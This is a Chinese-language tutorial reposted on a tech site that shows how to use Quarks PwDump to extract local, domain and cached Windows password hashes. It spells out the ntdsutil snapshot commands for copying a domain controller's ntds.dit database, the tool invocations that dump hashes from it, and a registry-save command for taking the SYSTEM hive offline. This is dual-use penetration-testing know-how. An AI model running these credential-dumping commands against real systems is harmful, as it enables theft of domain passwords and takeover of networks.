攻防实战:使用Quarks PwDump获取域控密码

来源:互联网
更新时间:2016/12/9 11:10:29
责任编辑:李志喜
字体:

Quarks PwDump是quarkslab出品的一款用户密码提取开源工具,目前软件最新版本为0.2b,其完整源代码可以从https://github.com/quarkslab/quarkspwdump获取,目前它支持Windows XP/2003/Vista/7/2008版本,且相当稳定。可以抓取windows平台下多种类型的用户凭据,包括:本地帐户、域帐户、缓存的域帐户和Bitlocker。作者开发这个工具的原因是现在没有一款工具能同时抓取所有类型的hash和Bitlocker信息。

工具源代码下载地址:https://codeload.github.com/quarkslab/quarkspwdump/zip/master。

它目前可以导出 :

– Local accounts NT/LM hashes + history 本机NT/LM哈希+历史登录记录
– Domain accounts NT/LM hashes + history 域中的NT/LM哈希+历史登录记录
– Cached domain password 缓存中的域管理密码
– Bitlocker recovery information (recovery passwords & key packages) 使用Bitlocker的恢复后遗留的信息。

1.使用Quarks PwDump本地帐号的哈希值

Quarks PwDump必须在Dos命令提示符下运行,直接运行QuarksPwDumpv0.2b.exe,如图1所示,默认显示帮助信息,其参数含义如下:

-dhl 导出本地哈希值
-dhdc导出内存中的域控哈希值
-dhd 导出域控哈希值,必须指定NTDS文件
-db 导出Bitlocker信息,必须指定NTDS文件
-nt 导出ntds文件
-hist 导出历史信息,可选项
-t 导出类型可选默认导出为John类型。
-o 导出文件到本地

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' border="0" alt="攻防实战:使用Quarks PwDump获取域控密码" src="http://img.xue163.com/s5images51cto/wyfs02/M01/7B/55/wKiom1bLxsrzUHUGAAA78Ng5f7Q332.jpg" width="358" height="196" />

图1使用Quarks PwDump本地帐号的哈希值

2.使用Quarks PwDump导出账号实例

使用命令“QuarksPwDumpv0.2b.exe -dhl -o 1.txt”将导出本地哈希值到当前目录的1.txt,执行命令会显示导出帐号的数量,如图2所示。显示有3个帐号导出到1.txt,打开1.txt可以看到导出哈希值的具体帐号和值。

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 504px; height: 222px" border="0" alt="攻防实战:使用Quarks PwDump获取域控密码" src="http://img.xue163.com/s2images51cto/wyfs02/M02/7B/54/wKioL1bLx0LQCj5QAAEPT3sdsyc433.jpg-wm_1-wmp_4-s_3394248575.jpg" width="758" height="344" />

图2导出本地帐号到文件

3.配合ntdsutil工具导出域控密码

Ntdsutil.exe是一个为 Active Directory 提供管理设施的命令行工具。可使用Ntdsutil.exe 执行Active Directory的数据库维护,管理和控制单个主机操作,创建应用程序目录分区,以及删除由未使用Active Directory安装向导 (DCPromo.exe)成功降级的域控制器留下的元数据。Ntdsutil还可以用来获取域控数据库ntds.dit文件,具体命令如下:

(1)创建快照

ntdsutil snapshot "activate instance ntds" create quit quit

(2)Ntdsutil挂载活动目录的快照

ntdsutil snapshot "mount {GUID}" quit quit

{GUID}为动态获取的,如图3所示。

(3)复制快照的本地磁盘

copy MOUNT_POINT\windows\NTDS\ntds.dit c:\ntds.dit

(4)卸载快照

ntdsutil snapshot "unmount {GUID}" quit quit

(5)删除快照

ntdsutil snapshot "delete {GUID}" quit quit

点击图片看大图中国学网 www.xue163.com

498)this.width=498;' onmousewheel = 'javascript:return big(this)' style="width: 433px; height: 290px" border="0" alt="攻防实战:使用Quarks PwDump获取域控密码" src="http://img.xue163.com/s5images51cto/wyfs02/M01/7B/54/wKioL1bLx17T1mjDAAEC4G9fgxU830.jpg-wm_1-wmp_4-s_4058960765.jpg" width="651" height="409" />

图3导出快照文件

使用命令“QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit”将导出的ntds.dit文件中哈希值全面导出。一个完整的实例如下:

tdsutil snapshot "activate instance ntds" create quit quit
ntdsutil snapshot "mount {a0455f6c-40c3-4b56-80a0-80261471522c}" quit quit
快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接为 C:\$SNAP_201212082315_VOLUM
EC$\
copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
ntdsutil snapshot "unmount {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
ntdsutil snapshot "delete {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit quit
QuarksPwDump.exe --dump-hash-domain --ntds-file c:\ntds.dit

说明:获取哈希值最好都在同一台服务器上执行,也即将QuarksPwDump.exe直接放在导出ntds.dit服务器上,执行导出命令。如果仅仅将ntds.dit复制后下载本地可能会出现无法读取错误。网上也曾经出现一个NTDS.dit密码快速提取工具ntdsdump,读者可以自己进行测试。如果是想下载ntds.dit到本地恢复还需要执行“reg save hklm\system system.hive”,将system.hive和ntds.dit全部复制到本地进行域控密码获取。

参考资料

1. Quarks PwDump,http://blog.quarkslab.com/quarks-pwdump.html

2. NTDS.dit密码快速提取工具,http://www.secpulse.com/archives/6301.html

www.xue163.com true /5/59650.html report 5855 攻防实战:使用QuarksPwDump获取域控密码,QuarksPwDump是quarkslab出品的一款用户密码提取开源工具,目前软件最新版本为0.2b,其完整源代码可以从https://github.com/quarkslab/quarkspwdump获取,目前它支持WindowsXP/2003/...
最近关注
首页推荐
热门图片
相关文章:攻防实战 quark
最新添加资讯
24小时热门资讯
攻防实战 quark
精彩资讯
精彩推荐
热点推荐
真视界
精彩图片
社区精粹
关于本站 | 广告服务 | 手机版 | 商务合作 | 免责申明 | 招聘信息 | 联系我们
Copyright © 2004-2016 Xue163.com All Rights Reserved. 中国学网 版权所有
京ICP备10044368号-1 京公网安备11010802011102号
荐闻 | 学网头条知识问答 | 装修 | 作业 | 荐闻 | 学网头条精彩微信 | 新闻中心 | 软件教室 | 设计大全 | 网络相关 | 英语学习 | 开发编程 | 考试中心 | 参考范文 | 管理文库 | 营销中心 | 站长之家 | IT信息中心 | 商学院 | 数码大全 | 硬件DIY | 企业服务 | 网吧在线 | 问吧 | 百科 | 硬件知识 | 本网视点 | 文库 | 手机 | 平板 | 汽车 | 游戏 | 家电 | 精彩摄影 | 时尚科技 | 现代家居 | IT女人 | 经验 | 每日新闻 | 健康养生 | 图书馆 | 猎奇 | 精彩看点 | 图库 | 新闻中心 | 软件教室 | 设计大全 | 网络相关 | 英语学习 | 开发编程 | 考试中心 | 参考范文 | 管理文库 | 营销中心 | 站长之家 | IT信息中心 | 商学院 | 数码大全 | 硬件DIY | 企业服务 | 网吧在线 | 问吧 | 百科 | 硬件知识 | 本网视点 | 文库 | 手机 | 平板 | 汽车 | 游戏 | 家电 | 精彩摄影 | 时尚科技 | 现代家居 | IT女人 | 经验 | 每日新闻 | 健康养生 | 图书馆 | 精彩微信 | 猎奇 | 精彩看点 | 图库编程 方案 信息windows方案windows answer文档机构教育文档问答中心IT编程数码信息解决方案信息中心IT科技